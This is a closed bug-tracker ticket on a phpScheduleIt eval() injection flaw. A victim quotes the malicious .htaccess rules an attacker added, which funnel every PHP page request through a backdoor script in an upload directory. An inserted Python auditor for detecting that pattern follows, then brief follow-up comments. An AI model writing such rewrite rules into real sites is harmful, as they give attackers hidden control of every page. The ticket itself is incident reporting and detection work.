#97 Security: eval() Injection Vulnerability

Status: closed
Milestone: 1.2.0 (31)
Priority: 9
Updated: 2014-04-21
Created: 2008-12-22
Private: No

http://www.securityfocus.com/bid/31520
http://secunia.com/advisories/32073/

Our site was hacked while using version 1.2.10. Our security team believes that this was the method used to gain access to the site. They added some lines to the .htaccess file, uploaded a file to our /files directory, and uploaded several files in the root directories of our two phpScheduleIt installations.

Lines added to .htaccess:
RewriteEngine On
RewriteCond /www/htdocs/web/siteroot/files/incladd.php -f
RewriteCond %{REQUEST_URI} !incladd.php$
RewriteCond %{REQUEST_URI} !73e69772.php$
RewriteRule ^.*.(php[s345]?|[ps]?html?)$ /files/incladd.php?file=%{SCRIPT_FILENAME}&%{QUERY_STRING} [NC,L]
RewriteEngine On
RewriteCond %{REQUEST_URI} !e27717cd.php$
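The rewrite block quoted above routes every request for a PHP or HTML page through the dropped /files/incladd.php, hands it the originally requested script path in the query string, and exempts two randomly named scripts from the rewrite. As an added example (not part of this ticket or of phpScheduleIt), the following Python audits an .htaccess file for exactly that pattern. It uses the reported lines as sample input and a constructed, benign front-controller file for comparison; the list of upload directory names and the "eight hex characters" filename heuristic are assumptions chosen for illustration.

```python
import re

# The .htaccess lines quoted in the report, reused here as sample input.
REPORTED_HTACCESS = """\
RewriteEngine On
RewriteCond /www/htdocs/web/siteroot/files/incladd.php -f
RewriteCond %{REQUEST_URI} !incladd.php$
RewriteCond %{REQUEST_URI} !73e69772.php$
RewriteRule ^.*.(php[s345]?|[ps]?html?)$ /files/incladd.php?file=%{SCRIPT_FILENAME}&%{QUERY_STRING} [NC,L]
RewriteEngine On
RewriteCond %{REQUEST_URI} !e27717cd.php$
"""

# Constructed benign file: a typical "pretty URL" front controller, which must not be flagged.
BENIGN_HTACCESS = """\
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php?route=$1 [QSA,L]
"""

# Assumption: these directories hold uploaded data and should never be a rewrite target for scripts.
UPLOAD_DIRS = ("files", "uploads", "upload", "images", "tmp")

SCRIPT_EXT = re.compile(r"php|phtml|html?", re.IGNORECASE)
# Heuristic (assumption): an exemption for a bare 8-hex-character .php name, as in the report.
HEX_NAME = re.compile(r"^!?[0-9a-f]{8}\.php\$?$")


def _first_segment(path):
    """Return the first directory component of a site-relative path, lower-cased."""
    return path.lstrip("/").split("/", 1)[0].lower()


def audit_htaccess(text, upload_dirs=UPLOAD_DIRS):
    """Scan .htaccess text and return (line number, reason, line) triples for suspicious directives."""
    findings = []
    engine_on_count = 0
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        directive = parts[0].lower()

        if directive == "rewriteengine":
            # A second "RewriteEngine On" usually means a block was appended to an existing file.
            engine_on_count += 1
            if engine_on_count > 1:
                findings.append((lineno, "duplicate RewriteEngine directive (appended block?)", line))

        elif directive == "rewritecond" and len(parts) >= 3:
            test_string, cond_pattern = parts[1], parts[2]
            # "-f"/"-s" on an absolute path inside an upload directory probes for a dropped file.
            if cond_pattern in ("-f", "-s") and any(f"/{d}/" in test_string.lower() for d in upload_dirs):
                findings.append((lineno, "existence probe for a script inside an upload directory", line))
            # Exempting a random-looking script name keeps a second backdoor reachable directly.
            if test_string == "%{REQUEST_URI}" and HEX_NAME.match(cond_pattern):
                findings.append((lineno, "rewrite exemption for a random-looking script name", line))

        elif directive == "rewriterule" and len(parts) >= 3:
            pattern, target = parts[1], parts[2]
            target_path, _, query = target.partition("?")
            # Script requests should never be redirected into a directory meant for uploads.
            if _first_segment(target_path) in upload_dirs and SCRIPT_EXT.search(target_path):
                findings.append((lineno, "requests routed to a script inside an upload directory", line))
            # Forwarding SCRIPT_FILENAME of every script request is the include-wrapper hijack shape.
            if SCRIPT_EXT.search(pattern) and "%{SCRIPT_FILENAME}" in query:
                findings.append((lineno, "original script path forwarded to a wrapper script", line))
    return findings


if __name__ == "__main__":
    for name, content in (("reported", REPORTED_HTACCESS), ("benign", BENIGN_HTACCESS)):
        print(f"== {name} ==")
        for lineno, reason, line in audit_htaccess(content):
            print(f"line {lineno}: {reason}\n    {line}")
```

Run against the reported block the audit flags six directives (the existence probe, both hex-named exemptions, the rewrite target, the forwarded script path and the repeated RewriteEngine), while the constructed front-controller file yields nothing. In practice the same function can be pointed at every .htaccess under the web root as part of a file-integrity check, since a rewrite of this shape survives reinstalling the application unless the file itself is restored.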

Discussion

  • Robert McCrory - 2008-12-22

    Archive of files uploaded using eval() Injection

  • Pablo - 2011-02-11

    Has anyone come up with a code fix for this vulnerability? We were just compromised as well...

  • Nick Korbel - 2011-02-11

    Have you upgraded to 1.2.12?

  • Nick Korbel - 2014-04-21

    Status: open --> closed
